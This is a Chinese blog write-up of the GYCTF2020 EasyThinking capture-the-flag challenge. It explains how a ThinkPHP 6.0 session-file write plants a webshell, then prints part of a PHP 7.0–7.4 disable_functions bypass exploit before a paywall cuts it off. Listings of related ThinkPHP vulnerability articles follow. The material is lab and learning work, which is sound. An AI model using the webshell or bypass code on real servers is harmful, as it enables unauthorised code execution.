[GYCTF2020]EasyThinking Thinkphp6.0任意文件操作漏洞 绕过disable_function

最新推荐文章于 2024-07-13 05:13:27 发布
最新推荐文章于 2024-07-13 05:13:27 发布
阅读量2.5k 收藏 2
点赞数
CC 4.0 BY-SA版权
文章标签: python docker linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/scrawman/article/details/121593445
本文详细介绍了如何利用Thinkphp6.0框架的任意文件操作漏洞进行攻击。首先,通过注册并登录,修改Sessionid为php文件名,然后查看session文件内容。接着,通过搜索功能将字符串写入文件,并尝试植入一句话木马。由于存在disable_functions限制,作者找到了绕过的方法,并给出了GitHub上的相关脚本。最后,通过一系列的内存操作技巧,成功触发任意命令执行,获取系统权限。但遗憾的是,未能直接读取flag。此文章深入剖析了Web安全漏洞利用过程,适合安全研究者参考。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[GYCTF2020]EasyThinking
一开始还以为是XSS漏洞,因为搜索记录会被保存。后来查了才知道是Thinkphp 6.0框架的任意文件操作漏洞。先注册一个账号登录,登录时抓包修改Session id为php文件名,长度是32位
在这里插入图片描述
session文件在/runtime/session/目录下,这是默认的。文件名是sess_加我们刚刚写的32位字符串:sess_0123456789012345678901234567.php。
我们可以先来看一下此时这个文件里有什么
在这里插入图片描述
然后我们搜索一下再看这个文件,可以看到我们搜索的字符串是被写进去了。
在这里插入图片描述
把一句话木马写进去,蚁剑连一下。连进去了但是不能读flag,要绕过disable_functions
在这里插入图片描述
github上找绕过的脚本,这老哥真强啊https://github.com/mm0r1/exploits/tree/master/php-filter-bypass
有很多可以用的版本,根据网站的php版本来选好了

<?php

# PHP 7.0-7.4 disable_functions bypass PoC (*nix only)

pwn("/readflag");

function pwn($cmd) {
   
   
    global $abc, $helper, $backtrace;

    class Vuln {
   
   
        public $a;
        public function __destruct() {
   
    
            global $backtrace; 
            unset($this->a);
            $backtrace = (new Exception)->getTrace(); # ;)
            if(!isset($backtrace[1]['args'])) {
   
    # PHP >= 7.4
                $backtrace = debug_backtrace();
            }
        }
    }

    class Helper {
   
   
        public $a, $b, $c, $d;
    }

    function str2ptr(&$str, $p = 0, $s = 8) {
   
   
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
   
   
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    function ptr2str($ptr, $m = 8) {
   
   
        $out = "";
        for ($i=0; $i < $m; $i++) {
   
   
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }

    function write(&$str, $p, $v, $n = 8</
最低0.47元/天 解锁文章

200万优质内容无限畅学
scrawman
关注
php漏洞搭建复现,ThinkPHP6.0 任意文件操作 漏洞分析复现
weixin_29009501的博客
03-22 1318
一、漏洞简介2020年1月10日,ThinkPHP团队发布一个补丁更新,修复了一处由不安全的SessionId导致的任意文件操作漏洞。该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell。攻击者可利用此漏洞构造恶意的数据报文,向服务器写入任意内容的文件,从而能够达到远程代码执行.二、影响范围ThinkPHP6.0.0ThinkPHP6...
thinkphp6 swoole-rpc 基于thinkphp6(tp6)+ swoole的rpc框架实现
tianyu455764041的博客
12-18 4989
浏览了大量关于php 的rpc,但是多数为原生php实现rpc的demo。虽然很多人都知道rpc 的原理,但是对于编写代码并没有一个直观的感受,所以这次手写一个自定义rpc框架,基于使用tp6来完成rpc框架。这次以代码为主,中间使用的一些技术分享,理论性的东西不在一一概括,用最简单的话来解释其中很多技术!(如果对rpc不太了解的话,请翻上一篇文章) 概括 简述:client端调用server端 如果server端的代码为本地则是本地调用,如果server端的代码在另外一台机器就需要远程调用(Rp
ThinkPHP v6.0.7
04-21
V6.0.7版本发布,本版本主要针对上个版本做了一些路由修正,还意外收获了一些性能提升,是一个建议更新的版本。主要更新 修正Validate类的PHP8兼容性 改进redis驱动的append方法 修正路由匹配检测问题 优化路由变量正则规则生成 改进responseView的内容渲染 安装和更新 V6版本开始仅支持Composer安装及更新,支持上个版本的无缝更新,直接使用composer update 更新到最新版本即可。如果需要全新安装,使用:composer create-project topthink/think tpThinkPHP 是一个免费开源的,快速、简单的面向对象的 轻量级PHP开发框架 ,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多的原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进,已经成长为国内最领先和最具影响力的WEB应用开发框架,众多的典型案例确保可以稳定用于商业以及门户级的开发。全面的WEB开发特性支持最新的ThinkPHP为WEB应用开发提供了强有力的支持,这些支持包括:MVC支持-基于多层模型(M)、视图(V)、控制器(C)的设计模式ORM支持-提供了全功能和高性能的ORM支持,支持大部分数据库模板引擎支持-内置了高性能的基于标签库和XML标签的编译型模板引擎RESTFul支持-通过REST控制器扩展提供了RESTFul支持,为你打造全新的URL设计和访问体验云平台支持-提供了对新浪SAE平台和百度BAE平台的强力支持,具备“横跨性”和“平滑性”,支持本地化开发和调试以及部署切换,让你轻松过渡,打造全新的开发体验。CLI支持-支持基于命令行的应用开发RPC支持-提供包括PHPRpc、HProse、jsonRPC和Yar在内远程调用解决方案MongoDb支持-提供NoSQL的支持缓存支持-提供了包括文件、数据库、Memcache、Xcache、Redis等多种类型的缓存支持安全性框架在系统层面提供了众多的安全特性,确保你的网站和产品安全无忧。这些特性包括:XSS安全防护表单自动验证强制数据类型转换输入数据过滤表单令牌验证防SQL注入图像上传检测
ThinkPHP6.0.1_任意文件写入漏洞分析
11-29 982
ThinkPHP6.0.1_任意文件写入漏洞分析 ThinkPHP6.0.0-ThinkPHP6.0.1 漏洞代码<?php namespace app\controller; use app\BaseController; class Index extends BaseController{ public function index(){ $a = $_GET['a']; $b = $_GET['b']; session($a,$b);
popepassthru php,一次ThinkPHP引发的bypass_disable_functions
weixin_42522552的博客
03-28 372
查看disable_functions,发现是可爱的宝塔禁用了passthru,exec,system,chroot,chgrp,chown,shell_exec,popen,proc_open,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,还有啥是宝塔不能禁的。。。还能怎么办,接着肝,在网上学习了大佬的...
ThinkPHP6 任意文件操作漏洞分析
bylfsj的博客
02-15 2803
公众号:https://mp.weixin.qq.com/s/UPu6cE20l24T6fkYOlSUJw 漏洞介绍 2020年1月10日,ThinkPHP团队发布一个补丁更新,修复了一处由不安全的SessionId导致的任意文件操作漏洞。该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell。 具体受影响版本为ThinkPHP6.0....
php --对接支付宝支付,菜鸟教程(以官方sdk做教程,thinkphp框架为例)
热门推荐
Baron0071的博客
06-27 1万+
1,目前市面上最为火爆的支付为,wechat以及alipay ,这两个支付想必大家都已经非常了解了。 下面我将对支付宝支付对接有比较详细的讲解 第一步,我们需要我支付权限包含的私钥,公钥,appid等等一系列权限,开发者工具里面查看 2,支付宝官方入口文件 Aopsdk 引入支付宝文件 引入后就可以直接在资金的paymentApi里面使用了,附上代码 vend...
thinkphp6实战Rabbitmq之延时队列(完整篇)
qq_21273321的博客
08-16 1419
thinkphp6之rabbitmq延时队列
Thinkphp框架
aming小老弟
10-11 783
作为一个整体开发解决方案,ThinkPHP能够解决应用开发中的大多数需要,因为其自身包含了底层架构、兼容处理、基类库、数据库访问层、模板引擎、缓存机制、插件机制、角色认证、表单处理等常用的组件,并且对于跨版本、跨平台和跨数据库移植都比较方便。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,ThinkPHP框架本身没有什么特别模块要求,具体的应用系统运行环境要求视开发所涉及的模块。
ThinkPHP6.0 反序列化漏洞
Sentiment的博客
05-31 3284
当时学tp就是为了国赛,审了审3和5的寻思已经够用了肯定不能出6的吧就没再审,没想到这次就出了6.012的反序列化还好很简单,所以还是回过头审一遍吧 配置 序言 · ThinkPHP6.0完全开发手册 · 看云 (kancloud.cn) 6.0.1 composer create-project topthink/think tp6.0.1 "require": { "php": ">=7.1.0", "topthink/framework": "6.0.1
thinkphp 一键漏洞检测
12-09
thinkphp 一键漏洞检测,V3.2.0~V5.1.23,都可进行测试
ThinkPHP6.0反序列化漏洞
m0_47968686的博客
01-21 6135
ThinkPHP6.0反序列化漏洞 前言 在学习大师傅们的thinkPHP6.0.x的反序列化漏洞复现文章时,发现自己下载的TP版本是被修复过后的版本。于是更改一下旧链达到RCE。在看本文章前先去看一下上述提到的大师傅的文章。 修补之处 __destruct链触发走的路一样 __toString链最终利用点不同 在旧版本当中,trait Attribute中499行else里面就是最终执行动态函数的地方,所以需要绕过496行的if语句。 但是我复现的时候发现了新版本做了更改即使绕过了496处的if语句在e
[GYCTF2020]EasyThinking【TP6 + disable_functions】
D.MIND 的博客
04-30 624
文章目录TP6 任意文件操作的利用方式:disable_functions的绕过总结:参考: 题目名为:[GYCTF2020]EasyThinking 猜到是考ThinkPHP了,上来可以直接试试www.zip,发现果然有源码泄露 先随便访问一下使页面错误从而查看版本号 是TP6的版本,没审过,继续看看网站上有啥功能,发现可以注册并登录,且有一个搜索功能,搜索的结果可以查看出来,猜测这是一个被利用的功能点 上网搜一下有关TP6漏洞,看到一篇:ThinkPHP6 任意文件操作漏洞分析 这是有关SESSI
ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6,网络安全开发工程师面试题
2401_83947105的博客
04-14 1372
*漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0
PHP disable_function绕过
goddemon
09-11 707
disable_functions 典型禁用函数 绕过的几个思路 最基础的两个绕法 ①寻找没有被禁用的函数 PHP 中执行命令的函数有-->因此找没有禁用掉的就好了 system,shell_exec,passthru,exec,popen,proc_open,pcntl_exec,mail,putenv,apache_setenv,mb_send_mail,assert,dl,set_time_limit,ignore_user_abort,symlink,link,map_open,imap_m
php enable_dl,【安全红队】PHP绕过disable_function限制
weixin_32025789的博客
03-26 1079
上 利用环境变量和系统组件在维护网站时,为了安全,运维人员会禁用PHP的一些“危险”函数,将其写在 php.ini 配置文件中,就是我们所说的 disable_functions 了。例如:passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,...
ThinkPHP 6漏洞的深入探讨
最新发布
a159900的博客
07-13 812
ThinkPHP,作为一个在国内广泛使用的PHP开发框架,以其易用性和高效性赢得了众多开发者的青睐。我个人觉得随着技术的不断发展,安全问题也逐渐成为其必须面对的挑战。近期,关于ThinkPHP 6漏洞问题引起了业界的广泛关注。本文将详细讨论ThinkPHP 6漏洞问题,分析其产生原因、影响以及防范策略。必须承认的是,ThinkPHP 6漏洞问题是一个不容忽视的安全挑战。开发者应关注并了解这些漏洞的产生原因和影响,采取相应的防范策略来保障网站的安全稳定。确保网站的安全和用户的隐私。
ThinkPHP v6.0.13 存在反序列化漏洞
OSCS开源安全社区
09-15 1855
OSCS(开源软件供应链安全社区)通过最快、最全的方式,发布开源项目最新的安全风险动态,包括开源组件安全漏洞、事件等信息。ThinkPHP 6.0.13版本中存在反序列化漏洞,攻击者可通过精心设计的 payload 在 Psr6Cache 组件中通过反序列化执行任意代码,甚至接管服务器。避免使用unserialize()方法去反序列化用户输入的数据。ThinkPHP 是一个免费开源的,轻量级的PHP开发框架。该漏洞已存在 POC。
ThinkPHP v6.0.x反序列化漏洞复现与分析
weixin_45794666的博客
03-02 1万+
thinkPHP v6.0.0-6.0.3反序列化漏洞复现与分析 环境搭建 初始环境,需要注意的是,新版v6基于PHP7.1+开发 php-7.2.9 ThinkPHP v6.0.3 使用composer进行安装 composer create-project topthink/think=6.0.3 tp6.0 ⚠️坑点,截止到2021/09/16 ,默认核心安装的为framework=v6.0.9 think-orm=2.0.44 但是到最后面部分代码段已经修复了利用点,所以为了避免大家再次踩坑,请
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值